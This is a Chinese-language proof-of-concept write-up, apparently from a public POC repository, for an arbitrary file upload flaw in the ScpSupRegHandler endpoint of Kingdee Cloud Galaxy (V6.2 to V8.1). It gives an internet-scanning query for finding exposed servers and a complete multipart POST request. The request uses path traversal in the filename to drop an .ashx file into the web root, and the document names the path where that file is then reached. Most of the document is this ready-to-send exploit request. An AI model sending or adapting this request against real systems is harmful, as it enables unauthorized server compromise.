POC00/金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞.md

52 lines
1.4 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞
### 漏洞描述:
金蝶OA云星空 ScpSupRegHandler接口存在任意文件上传漏洞攻击者通过漏洞可以上传任意文件获取服务器权限
### 漏洞影响:
金蝶云星空企业版私有云、企业版私有云订阅、标准版私有云订阅三个产品V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁)
### 网络测绘:
```
app="金蝶云星空-管理中心"
```
### 漏洞复现:
登陆页面
POC:
```
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 973
Accept-Language: zh-CN,zh;q=0.8
Accept: */*Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="dbId_v"
.
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FID"
2022
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."
Content-Type: text/plain
11
--2ac719f8e29343df94aa4ab49e456061-
```
![image](https://github.com/wy876/POC/assets/139549762/0175cf8c-a854-4b15-800c-7a07e3d0306c)
![image](https://github.com/wy876/POC/assets/139549762/7e731399-8257-448b-9ab4-2260d9c4dc43)
### 文件上传路径
```
访问路径:/K3Cloud/uploadfiles/Test.ashx
```